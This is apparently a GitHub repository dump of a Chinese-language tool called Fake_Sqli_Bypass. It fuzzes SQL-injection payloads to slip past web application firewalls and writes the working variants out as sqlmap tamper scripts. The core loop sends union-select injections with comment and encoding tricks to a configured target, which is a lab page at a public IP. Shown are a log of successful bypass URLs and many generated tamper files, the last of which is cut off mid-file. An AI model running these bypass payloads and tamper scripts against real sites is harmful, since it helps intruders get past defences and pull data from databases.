├── README.md ├── config └── settings.py ├── core ├── core.py ├── core_rule.py ├── core_tamper.py └── tamper.py ├── main.py ├── reustl └── 2kaWmSUK.txt └── tamper ├── 1qXnLaZt.py ├── 6pUbO49E.py ├── CtFNiUu7.py ├── GemX9jaw.py ├── HvT526x8.py ├── JPrYoOBp.py ├── NvT4KaS2.py ├── PUFt1WTK.py ├── QrUvl3pe.py ├── SU3botaZ.py ├── ScdTj24X.py ├── aBHpzUJt.py ├── akWiTqmb.py ├── fK4cXmhM.py ├── jPkopBzE.py ├── lw35khJV.py ├── nNkdOoSI.py ├── pkROU2yh.py ├── tm9qS0NR.py ├── tsi0Jpkc.py ├── wYVnJQl7.py ├── xY6FuKhe.py └── zKBxZXW5.py /README.md: -------------------------------------------------------------------------------- 1 | # Fake_Sqli_Bypass-自动化Fuzz Sqli/生成tamper 2 | ### Fake框架的自动化Fuzz WAF/IDS 功能 3 | ### 觉得使用还可以请点一个star让我体会一下工具也有人用的感觉 4 | 5 | 太久没写代码了,写的好丑hhhhhhhhh 6 |
7 | 其实这个功能点的开发并没有我想的这么简单,但是又非常的有意思,于是决定给他独立出来单独当一个功能,当然并不会在框架上分离出来. 8 | 至于后续的更新可能需要看情况以及有没有人使用,所以也没有一下子把功能写的非常完整,规则也是非常的简陋,直接采用网上现成的结果稍做修改。 9 |
10 | 规则也是非常的简陋,直接采用网上现成的结果稍做修改。 11 |
12 | 后续可能会依次更新规则库里面的规则,让它变得灵活化,人性化。 13 |
14 | 关于tamper的生成也比较简陋,但也还勉强能用 15 |
16 | 规则库后期采用WAF/IDS指纹对比,对应使用规则库,毕竟不同的waf拦截方式也是不同的,一个思路可能在这个waf上行不通在另外一个waf上可以绕过,正所谓术业有专攻,指定的waf有指定的payload,对于通用的还是很少的。 17 |
18 | 前期脚本只是放出来给大家娱乐娱乐,毕竟没有什么特别好用的操作 19 | 20 | >Author:思缘 21 | > 22 | >Team : [08Sec安全团队](https://www.08sec.org/) @校长办公室 23 | 24 | 25 | ## 使用方法 26 | 27 | 具体配置请修改config/settings.py 28 |
29 | 有些配置还没有写,只是摆设 30 | 31 | ``` 32 | git clone https://github.com/RandomSiYuan/Fake_Sqli_Bypass.git 33 | cd Fake_Sqli_Bypass 34 | python3 main.py 35 | ``` 36 | 37 | 38 | ## 已更新 39 | ### Fake_Sqli_Bypass v0.1 40 | 41 | 1.Fuzz 规则库更新 42 |
43 | 2.tamper生成 44 | 45 | ## Fake_Sqli_Bypass v0.1.5 46 | 47 | 1.Fuzz 规则库更新 48 | 49 | ## 预计更新 50 | ### Fake_Sqli_Bypass v0.2 51 | 52 | 1.Fuzz 规则库更新 53 |
54 | 2.porxy 代理池 55 |
56 | 3.WAF识别 对应WAF选择规则库 57 |
58 | -------------------------------------------------------------------------------- /config/settings.py: -------------------------------------------------------------------------------- 1 | class settings: 2 | url = "http://106.53.98.8/Less-1/?id=-1%27" 3 | str = "Your Login name:2" 4 | 5 | #代理池配置 6 | 7 | porxy_host = "127.0.0.1" # 8 | porxy_port = "8888" 9 | porxy_open = False 10 | 11 | #存储方式 12 | save_open = True 13 | save_method = "txt" #mysql | txt 14 | save_url = "reustl/" 15 | #Mysql 配置 16 | ysql_host ="127.0.0.1" 17 | mysql_port = "3306" 18 | mysql_db = "fuzz_sql" 19 | 20 | #线程 21 | thread_num = 50 22 | 23 | #tamper生成 24 | tamper_dir = 'tamper/' 25 | tamper_open = True 26 | 27 | #info 28 | debug = 0 29 | 30 | 31 | headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.3 6 SE 2.X MetaSr 1.0"} -------------------------------------------------------------------------------- /core/core.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from core import core_rule,core_tamper 3 | from config import settings 4 | import random 5 | import string 6 | from urllib.parse import quote 7 | 8 | txt_str = ''.join(random.sample(string.ascii_letters + string.digits, 8)) 9 | 10 | class fuzz: 11 | 12 | 13 | def Ddun_start(self,url,strs): 14 | 15 | 16 | fuzz = core_rule.rule.dseaf_rule_base(object) 17 | fuzz_payload = core_rule.rule.Comment_rule_base(object) 18 | 19 | 20 | url_start = url 21 | 22 | for start in fuzz_payload['start']: 23 | for a in fuzz['fuzz_sz']: 24 | for b in fuzz['fuzz_sz']: 25 | for c in fuzz['fuzz_zs']: 26 | ran_str = ''.join(random.sample(string.ascii_letters + string.digits, 8)) 27 | txt_str1 = ''.join(random.sample(string.ascii_letters + string.digits, 2)) 28 | payload = start+txt_str1+quote(a)+txt_str1+quote(b)+c+fuzz_payload['end'][0] 29 | tamper = core_tamper.tamper.return_def_tamper(payload) 30 | exp = "union" + payload + "(select%201,2,3)-- +" 31 | url = url_start + exp 32 | print(url) 33 | res = requests.get(url=url, headers=settings.settings.headers) 34 | # print(res.text.find("true")) 35 | if res.text.find("true") == -1: 36 | if strs in res.text: 37 | print("【*】Find Fuzz bypass:" + url + " | payload:" + payload) 38 | if settings.settings.tamper_open: 39 | print("【+】Write Tamper: /tamper/" + ran_str + ".py") 40 | with open('tamper/' + ran_str + '.py', 'w') as f: 41 | f.write(tamper) 42 | if settings.settings.save_open: 43 | if settings.settings.save_method == "txt": 44 | print("【+】Write Txt Log: /tamper/" + txt_str + ".txt") 45 | with open(settings.settings.save_url + txt_str + '.txt', 'a') as f: 46 | f.write(url + '\n') 47 | 48 | def fuzz_start(self,url,strs): 49 | fuzz = core_rule.rule.default_rule_base(object) 50 | fuzz_payload = core_rule.rule.safedog_rule_base(object) 51 | url_start = url 52 | for a in fuzz: 53 | for b in fuzz: 54 | for c in fuzz: 55 | for d in fuzz: 56 | ran_str = ''.join(random.sample(string.ascii_letters + string.digits, 8)) 57 | payload = str(fuzz_payload[0])+a+b+c+d+str(fuzz_payload[1]) 58 | tamper = core_tamper.tamper.return_def_tamper(payload) 59 | exp = "union"+payload+"(select%201,2,3)-- +" 60 | url = url_start + exp 61 | #print(url) 62 | res = requests.get(url = url , headers = settings.settings.headers) 63 | #print(res.text.find("true")) 64 | if res.text.find("true")==-1: 65 | if strs in res.text: 66 | print("【*】Find Fuzz bypass:"+url + " | payload:"+payload) 67 | if settings.settings.tamper_open: 68 | print("【+】Write Tamper: /tamper/"+ran_str+".py") 69 | with open('tamper/'+ran_str+'.py','w') as f: 70 | f.write(tamper) 71 | 72 | if settings.settings.save_open: 73 | if settings.settings.save_method == "txt": 74 | print("【+】Write Txt Log: /tamper/" + txt_str + ".txt") 75 | with open(settings.settings.save_url + txt_str + '.txt', 'a') as f: 76 | f.write(url+'\n') 77 | 78 | -------------------------------------------------------------------------------- /core/core_rule.py: -------------------------------------------------------------------------------- 1 | class rule: 2 | 3 | def default_rule_base(self): 4 | fuzz_zs = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00'] 5 | fuzz_sz = ['', ' '] 6 | fuzz_ch = ["%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j"] 7 | fuzz = fuzz_zs + fuzz_sz + fuzz_ch 8 | return fuzz 9 | def safedog_rule_base(self): 10 | 11 | fuzz_payload = ["%23aa","%0a"] 12 | 13 | return fuzz_payload 14 | 15 | def Comment_rule_base(self): 16 | 17 | comment = { 18 | "start":["/*","/*!","/*!50000"], 19 | "end":["*/"] 20 | } 21 | return comment 22 | 23 | def dseaf_rule_base(self): 24 | fuzz = { 25 | "fuzz_sz" : [" ", "<", ">", "&", "&auot;", "'", "¢", "£", "¥", "&euro"], 26 | "fuzz_zs" : ["%00", "%20", "%0a", "%23", "0b", "%26", "%2b","%00"] 27 | } 28 | return fuzz 29 | 30 | -------------------------------------------------------------------------------- /core/core_tamper.py: -------------------------------------------------------------------------------- 1 | class tamper: 2 | 3 | def __init__(self,payload): 4 | self.payload = payload 5 | 6 | def return_def_tamper(payload): 7 | tamper = '''#!/usr/bin/env python 8 | 9 | """ 10 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 11 | See the file 'doc/COPYING' for copying permission 12 | """ 13 | 14 | from lib.core.enums import PRIORITY 15 | 16 | __priority__ = PRIORITY.LOW 17 | 18 | def dependencies(): 19 | pass 20 | 21 | def tamper(payload, **kwargs): 22 | """ 23 | Replaces space character (' ') with comments '/**/' 24 | 25 | Tested against: 26 | * Microsoft SQL Server 2005 27 | * MySQL 4, 5.0 and 5.5 28 | * Oracle 10g 29 | * PostgreSQL 8.3, 8.4, 9.0 30 | 31 | Notes: 32 | * Useful to bypass weak and bespoke web application firewalls 33 | 34 | >>> tamper('SELECT id FROM users') 35 | 'SELECT/**/id/**/FROM/**/users' 36 | """ 37 | 38 | retVal = payload 39 | 40 | if payload: 41 | retVal = "" 42 | quote, doublequote, firstspace = False, False, False 43 | 44 | for i in xrange(len(payload)): 45 | if not firstspace: 46 | if payload[i].isspace(): 47 | firstspace = True 48 | retVal += "{}" 49 | continue 50 | 51 | elif payload[i] == '\\'': 52 | quote = not quote 53 | 54 | elif payload[i] == '"': 55 | doublequote = not doublequote 56 | 57 | elif payload[i] == " " and not doublequote and not quote: 58 | retVal += "{}" 59 | continue 60 | 61 | retVal += payload[i] 62 | 63 | return retVal''' 64 | 65 | return tamper.format(payload,payload) 66 | 67 | 68 | # a = tamper.return_def_tamper('aaaaa') 69 | # print(a) -------------------------------------------------------------------------------- /core/tamper.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RandomSiYuan/Fake_Sqli_Bypass/bf091f9e5937ea6ffdc54c2ba9482c1f0d06631e/core/tamper.py -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from core import core_rule 3 | from config import settings 4 | from core import core 5 | 6 | 7 | def meun(): 8 | print("\r\r\r--------------------------------------------") 9 | print("\r\r\r--------------------------------------------") 10 | print("\r\r\r Author:SiYuan ") 11 | print("\r\r\r 08sec https://www.08sec.org/ ") 12 | print("\r\r\r @xzbgs ") 13 | print("\r\r\r--------------------------------------------") 14 | print("\r\r\r--------------------------------------------") 15 | 16 | 17 | 18 | if __name__ == '__main__': 19 | meun() 20 | core.fuzz.Ddun_start(object,settings.settings.url,settings.settings.str) 21 | core.fuzz.fuzz_start(object, settings.settings.url, settings.settings.str) -------------------------------------------------------------------------------- /reustl/2kaWmSUK.txt: -------------------------------------------------------------------------------- 1 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*/*%0a(select%201,2,3)-- + 2 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/**/%0a(select%201,2,3)-- + 3 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*/*!%0a(select%201,2,3)-- + 4 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/**%0a(select%201,2,3)-- + 5 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*=%0a(select%201,2,3)-- + 6 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*`%0a(select%201,2,3)-- + 7 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*!%0a(select%201,2,3)-- + 8 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*@%0a(select%201,2,3)-- + 9 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*.%0a(select%201,2,3)-- + 10 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*-%0a(select%201,2,3)-- + 11 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*+%0a(select%201,2,3)-- + 12 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*|%0a(select%201,2,3)-- + 13 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*%0a(select%201,2,3)-- + 14 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/* %0a(select%201,2,3)-- + 15 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*%0b%0a(select%201,2,3)-- + 16 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*%0c%0a(select%201,2,3)-- + 17 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*%0d%0a(select%201,2,3)-- + 18 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*%0e%0a(select%201,2,3)-- + 19 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*%0f%0a(select%201,2,3)-- + 20 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/**//*%0a(select%201,2,3)-- + 21 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/**/*/%0a(select%201,2,3)-- + 22 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/**//*!%0a(select%201,2,3)-- + 23 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/**/*%0a(select%201,2,3)-- + 24 | -------------------------------------------------------------------------------- /tamper/1qXnLaZt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/6pUbO49E.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/**/*/%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/**/*/%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/CtFNiUu7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*/*%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*/*%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/GemX9jaw.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/**//*%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/**//*%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/HvT526x8.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*+%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*+%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/JPrYoOBp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*%0e%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*%0e%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/NvT4KaS2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*|%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*|%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/PUFt1WTK.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*.%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*.%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/QrUvl3pe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/**/*%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/**/*%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/SU3botaZ.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*@%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*@%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/ScdTj24X.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*%0d%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*%0d%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/aBHpzUJt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = 